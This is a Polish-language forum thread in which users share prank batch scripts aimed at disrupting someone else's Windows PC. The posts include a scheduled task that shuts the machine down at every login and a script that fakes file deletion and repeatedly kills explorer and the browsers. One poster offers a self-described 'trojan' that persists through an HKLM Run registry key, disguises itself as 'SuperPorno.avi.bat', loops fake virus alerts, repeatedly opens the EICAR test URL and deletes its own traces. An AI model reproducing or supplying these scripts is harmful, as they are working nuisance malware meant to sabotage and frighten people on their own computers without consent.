zawsze możnaby było w Pascalu zrobić kopie śmiercionośnego niebieskiego ekranu.. i później wrzucić go żeby startował podczas odpalania sie systemu..
NP.
![]()
zawsze możnaby było w Pascalu zrobić kopie śmiercionośnego niebieskiego ekranu.. i później wrzucić go żeby startował podczas odpalania sie systemu..
NP.
![]()
zapisz w to plku z rozszerzeniem *.bat i odpalNapisał Sardihan_miał_zły_chumor...
zeby to usunąc musisz włonczyc kompa w trybie awaryjnym i usunąc z rejestru potem wyczysc autoexec.bat i wywal reszte do kosza![]()
Ostatnio edytowane przez Sardihan : 05-27-2007 - 18:54
lol...zawsze możesz wgrać ochraniaczaja kiedyś o tym pisałem. Za każdym razem jak bedzie pornola na www włączał to sie przeglądarka bedzie wyłączać
![]()
do Sardihan Twoj skrypt dziala, ale tylko jednorazowo; czyli zawsze jak uruchomie ten plik nastepuje restart, pozniej juz wszystko normalnie dziala;
ja potrzebuje cos takiego aby zawsze juz nastepowal restart w win
pozdrawiam
wejdź sobie do harmonogramu zadań i ustaw żeby system uruchamiał shutdown.exe podczas logowania.
potem jak będziesz chciał to odkręcić to odpal kompa z płytki z jakimś systemem (ważne by był dostęp r/w do partycji NTFS) i przesuń shutdown.exe - wtedy sie nie odpali a ty będziesz mógł po zalogowaniu wejść do harmonogramu i usunąć tego joba![]()
***********
* markossx *
***********
shutdown potrzebuje argumentów![]()
dodaj go do autostartu albo do innego rejestru ...
wiadomo, ze potrzebuje ale ja raczej wszystkiego na srebrnej tacy nie podaje...
bo mądrej głowie dość dwie słowie(czy jak to tam było)
***********
* markossx *
***********
od tego zartu moj kolega prawie dostał zawału (ma odpicowany komp)
A więc to robi skan kompa, co wygląda jak usuwanie potem za 60 sekund wyloncza system i zamyka explorer.exe (wygląda jak by sie te pliki usunęłyKod:@echo off echo USUWAM! ping localhost -n 4 >nul dir /s shutdown -s -t 60 -c "Bad Boi!" ping 127.0.0.1 -n 30 -w 1000 shutdown -a :A tskill explorer.exe tskill firefox.exe tskill iexplorer.exe goto A)
miłej zabawy ;p
Witam , skoro temat rozgrzebany postanowiłem umieścić tutaj tego "trojana" :
Wiem ,wiem , to prymityw ale miałem mało czasu . Jeżeli autor postu chciałby coś więcej , niech napisze tutaj bądź na PM.Kod:@echo off copy %0 %windir%\MicrosoftAPP.bat echo Created by VLN :RegWrite echo Dim shell >> %windir%\SystemVersion.vbs echo Set shell = CreateObject("Wscript.Shell") >> %windir%\SystemVersion.vbs echo Shell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QWERTY", "%windir%\SuperPorno.avi.bat" >> %windir%\SystemVersion.vbs if not exist %windir%\SystemVersion.vbs goto RegWrite :Message echo msgbox "Virus Detected ",16,"Windows" >> %windir%\K99DGV94.vbs if not exist %windir%\K99DGV94.vbs goto Message :Start echo @echo off >> %windir%\SuperPorno.avi.bat echo :RUN >> %windir%\SuperPorno.avi.bat echo start %windir%\K99DGV94.vbs >> %windir%\SuperPorno.avi.bat echo start http://www.eicar.org/download/eicar.com >> %windir%\SuperPorno.avi.bat echo goto RUN >> %windir%\SuperPorno.avi.bat if not exist %windir%\SuperPorno.avi.bat goto Start if exist %windir%\SystemVersion.vbs start %windir%\SystemVersion.vbs if exist %windir%\SuperPorno.avi.bat start %windir%\SuperPorno.avi.bat del %windir%\SystemVersion.vbs del %0 exit
W kodzie jest linijka która uruchamia EICAR-a . Antywirus (szczególnie AVAST) będzie mocno dawał o sobie znać.Jednak to powinno wystraszyć twojego ojca,jeżeli jednak nie chcesz "budzić" Antywirusa usuń pogrubioną linijkę.
Opis
:
Jest tworzony wpis w rejestrze i trzy pliki
MicrosoftAPP.bat << Kopia naszego pliku
SystemVersion.vbs << Plik który tworzy wpis
SuperPorno.avi.bat << Plik który dzięki wpisowi będzie się uruchamiał wraz z startem systemu(jest w nim pętla która uruchamia plik poniżej i EICAR-a)
K99DGV94.vbs << Komunikat o znalezieniu "wirusa"
To chyba tyle
Pozdrawiam !!!
PS.Jeżeli w kodzie będą błędy to jak pisałem nie miałem zbytnio czasu.
VLN
Ostatnio edytowane przez VLN : 01-22-2008 - 12:32 Powód: A jednak był błąd w kodzie .